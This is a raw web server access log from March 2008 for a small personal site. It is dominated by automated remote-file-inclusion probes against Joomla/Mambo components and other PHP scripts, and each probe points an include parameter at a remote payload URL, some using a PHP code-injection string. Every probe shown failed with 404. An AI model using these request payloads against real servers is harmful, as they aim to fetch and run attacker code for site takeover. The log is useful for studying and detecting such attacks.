207.58.179.218 - - [27/Mar/2008:09:37:53 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [27/Mar/2008:09:37:53 -0700] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.100.222 - - [27/Mar/2008:09:38:19 -0700] "GET /logs/access_080131.log/index2.php?x=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [27/Mar/2008:09:38:21 -0700] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.136.162 - - [27/Mar/2008:09:38:24 -0700] "GET /index.php?option=com_autolinks&Itemid=&mosConfig_absolute_path=http://www.motoxclub.org.au/forum/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.98.140.99 - - [27/Mar/2008:09:38:37 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.58.136.162 - - [27/Mar/2008:09:39:08 -0700] "GET /logs/access_071230.log/index.php?option=com_autolinks&Itemid=&mosConfig_absolute_path=http://www.motoxclub.org.au/forum/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.136.162 - - [27/Mar/2008:09:39:08 -0700] "GET /logs/index.php?option=com_autolinks&Itemid=&mosConfig_absolute_path=http://www.motoxclub.org.au/forum/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.136.162 - - [27/Mar/2008:09:39:25 -0700] "GET /logs/access_080119.log/index.php?option=com_autolinks&Itemid=&mosConfig_absolute_path=http://www.motoxclub.org.au/forum/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.84.2 - - [27/Mar/2008:09:39:25 -0700] "GET /logs/access_080223.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.84.2 - - [27/Mar/2008:09:39:26 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.75.164.16 - - [27/Mar/2008:09:39:29 -0700] "GET /logs/access_080131.log//akocomments.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.164.16 - - [27/Mar/2008:09:39:30 -0700] "GET /logs/access_080131.log//akocomments.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.164.16 - - [27/Mar/2008:09:39:30 -0700] "GET //akocomments.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.164.16 - - [27/Mar/2008:09:39:30 -0700] "GET //akocomments.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.164.16 - - [27/Mar/2008:09:39:30 -0700] "GET /logs//akocomments.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.164.16 - - [27/Mar/2008:09:39:30 -0700] "GET /logs//akocomments.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.58.179.218 - - [27/Mar/2008:09:39:43 -0700] "GET /logs/access_071209.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [27/Mar/2008:09:39:50 -0700] "GET /logs/access_080312.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.219.217.74 - - [27/Mar/2008:09:40:27 -0700] "GET /logs/access_080223.log//index.php?option=com_estateagent&act=easearch&Itemid=&mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.104.83.81 - - [27/Mar/2008:09:40:49 -0700] "GET /logs/access_080312.log%20%20/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://web87.go2game.de/vwar/images/member/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
74.53.84.2 - - [27/Mar/2008:09:40:58 -0700] "GET /logs/access_070923.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.40.110.80 - - [27/Mar/2008:09:41:35 -0700] "GET /logs/access_080312.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.40.110.80 - - [27/Mar/2008:09:41:35 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.40.110.80 - - [27/Mar/2008:09:41:35 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.65.76.195 - - [27/Mar/2008:09:42:04 -0700] "GET /logs/access_080128.log//akocomments.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.65.76.195 - - [27/Mar/2008:09:42:05 -0700] "GET //akocomments.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.65.76.195 - - [27/Mar/2008:09:42:05 -0700] "GET /logs//akocomments.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.75.164.16 - - [27/Mar/2008:09:42:09 -0700] "GET /logs/access_080201.log//akocomments.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.164.16 - - [27/Mar/2008:09:42:16 -0700] "GET /logs/access_080201.log//akocomments.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.166.35.71 - - [27/Mar/2008:09:42:24 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.65.76.195 - - [27/Mar/2008:09:42:26 -0700] "GET /logs/access_080128.log//akocomments.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.28 - - [27/Mar/2008:09:42:27 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://beta.bluesite.communicode.de/scripte/smarty/internals/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.65.76.195 - - [27/Mar/2008:09:42:27 -0700] "GET //akocomments.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.65.76.195 - - [27/Mar/2008:09:42:27 -0700] "GET /logs//akocomments.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.166.35.71 - - [27/Mar/2008:09:42:33 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.106.211.217 - - [27/Mar/2008:09:42:41 -0700] "GET /logs/access_080119.log//?pg=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.184.192 - - [27/Mar/2008:09:42:51 -0700] "GET /logs/access_080312.log//admin/business_inc/saveserver.php?thisdir=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.184.192 - - [27/Mar/2008:09:42:51 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.184.192 - - [27/Mar/2008:09:42:52 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.40.110.80 - - [27/Mar/2008:09:42:52 -0700] "GET /logs/access_080225.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.17.159 - - [27/Mar/2008:09:43:00 -0700] "GET /logs/access_080201.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.118.85.15 - - [27/Mar/2008:09:43:22 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.thehogbitch.com/modules/contr.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [27/Mar/2008:09:43:56 -0700] "GET /logs/access_080306.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [27/Mar/2008:09:43:57 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [27/Mar/2008:09:43:57 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
92.48.80.9 - - [27/Mar/2008:09:44:04 -0700] "GET /logs/access_080223.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
92.48.80.9 - - [27/Mar/2008:09:44:04 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.126.183.119 - - [27/Mar/2008:09:44:05 -0700] "GET /logs/access_080131.log/index2.php?x=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
92.48.80.9 - - [27/Mar/2008:09:44:05 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.65.76.195 - - [27/Mar/2008:09:44:11 -0700] "GET /logs/access_080215.log//akocomments.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.65.76.195 - - [27/Mar/2008:09:44:13 -0700] "GET /logs/access_080215.log//akocomments.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.88.24.0 - - [27/Mar/2008:09:45:30 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.buyindianproducts.com/includes/font/idrac2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.58.179.218 - - [27/Mar/2008:09:46:05 -0700] "GET /logs/access_080312.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [27/Mar/2008:09:46:05 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [27/Mar/2008:09:46:06 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
219.143.232.148 - - [27/Mar/2008:09:46:49 -0700] "GET /logs/access_080214.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.143.232.148 - - [27/Mar/2008:09:46:50 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.143.232.148 - - [27/Mar/2008:09:46:52 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.21.56 - - [27/Mar/2008:09:46:54 -0700] "GET /?S=A HTTP/1.0" 200 3078 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
207.58.179.218 - - [27/Mar/2008:09:47:17 -0700] "GET /logs/access_080313.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
92.48.80.9 - - [27/Mar/2008:09:47:21 -0700] "GET /logs/access_080225.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.245.149.70 - - [27/Mar/2008:09:47:23 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.245.149.70 - - [27/Mar/2008:09:47:24 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.245.149.70 - - [27/Mar/2008:09:47:24 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.40.17.23 - - [27/Mar/2008:09:47:32 -0700] "GET ///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
84.40.17.23 - - [27/Mar/2008:09:47:32 -0700] "GET /logs///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
80.249.117.99 - - [27/Mar/2008:09:47:45 -0700] "GET //index.php?option=com_poll&Itemid=52&mosConfig_absolute_path=http://2007.cultuurmarathon.nl/site/components/com_web/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
80.249.117.99 - - [27/Mar/2008:09:47:45 -0700] "GET /logs//index.php?option=com_poll&Itemid=52&mosConfig_absolute_path=http://2007.cultuurmarathon.nl/site/components/com_web/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
77.245.149.70 - - [27/Mar/2008:09:47:58 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.230.7.194 - - [27/Mar/2008:09:48:23 -0700] "GET /logs///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
87.230.7.194 - - [27/Mar/2008:09:48:24 -0700] "GET ///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
84.18.207.65 - - [27/Mar/2008:09:48:28 -0700] "GET /logs/access_080125.log//page_tail.php?includePath=http://japanese.hsc.ac.kr/bbs//skin/ruvin_fine_gall2/INFO/IID.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.65 - - [27/Mar/2008:09:48:29 -0700] "GET //page_tail.php?includePath=http://japanese.hsc.ac.kr/bbs//skin/ruvin_fine_gall2/INFO/IID.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.65 - - [27/Mar/2008:09:48:29 -0700] "GET /logs//page_tail.php?includePath=http://japanese.hsc.ac.kr/bbs//skin/ruvin_fine_gall2/INFO/IID.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [27/Mar/2008:09:49:00 -0700] "GET /logs/access_080306.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.206.47.131 - - [27/Mar/2008:09:49:04 -0700] "GET / HTTP/1.1" 200 3094 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
63.206.47.131 - - [27/Mar/2008:09:49:04 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
63.206.47.131 - - [27/Mar/2008:09:49:06 -0700] "GET /bikes/ HTTP/1.1" 200 2320 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
84.19.184.192 - - [27/Mar/2008:09:49:07 -0700] "GET /logs/access_080312.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.184.192 - - [27/Mar/2008:09:49:07 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.184.192 - - [27/Mar/2008:09:49:08 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.206.47.131 - - [27/Mar/2008:09:49:09 -0700] "GET /bikes/CreSTOC07/ HTTP/1.1" 200 15296 "http://www.dmulk.com/bikes/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
64.40.110.80 - - [27/Mar/2008:09:49:15 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.40.110.80 - - [27/Mar/2008:09:49:15 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.40.110.80 - - [27/Mar/2008:09:49:15 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.40.110.80 - - [27/Mar/2008:09:49:21 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.40.110.80 - - [27/Mar/2008:09:49:21 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.40.110.80 - - [27/Mar/2008:09:49:21 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.19.184.192 - - [27/Mar/2008:09:49:47 -0700] "GET /logs/access_080218.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.184.192 - - [27/Mar/2008:09:49:47 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.184.192 - - [27/Mar/2008:09:49:48 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.40.110.80 - - [27/Mar/2008:09:49:49 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.166.35.71 - - [27/Mar/2008:09:49:51 -0700] "GET /logs/access_080117.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.40.110.80 - - [27/Mar/2008:09:49:54 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.47.220.175 - - [27/Mar/2008:09:49:56 -0700] "GET //index.php?option=com_estateagent&act=easearch&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/peler88/31377albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.56.202.30 - - [27/Mar/2008:09:50:04 -0700] "GET /logs/access_080101.log/index.php?pageurl=http://onix2131.atspace.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.56.202.30 - - [27/Mar/2008:09:50:05 -0700] "GET /logs/index.php?pageurl=http://onix2131.atspace.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.19.184.192 - - [27/Mar/2008:09:50:25 -0700] "GET /logs/access_080312.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:09:50:55 -0700] "GET /logs/access_080215.log//mcf.php?content=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:09:50:56 -0700] "GET //mcf.php?content=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:09:50:56 -0700] "GET /logs//mcf.php?content=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.19.184.192 - - [27/Mar/2008:09:52:01 -0700] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.206.47.131 - - [27/Mar/2008:09:52:04 -0700] "GET /bikes/CreSTOC07/ HTTP/1.1" 200 15296 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
61.38.15.70 - - [27/Mar/2008:09:52:29 -0700] "GET ///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
61.38.15.70 - - [27/Mar/2008:09:52:30 -0700] "GET /logs///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
69.57.154.47 - - [27/Mar/2008:09:52:50 -0700] "GET /logs//includes/dbal.php?eqdkp_root_path=http://brothers.ro/modules/us.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
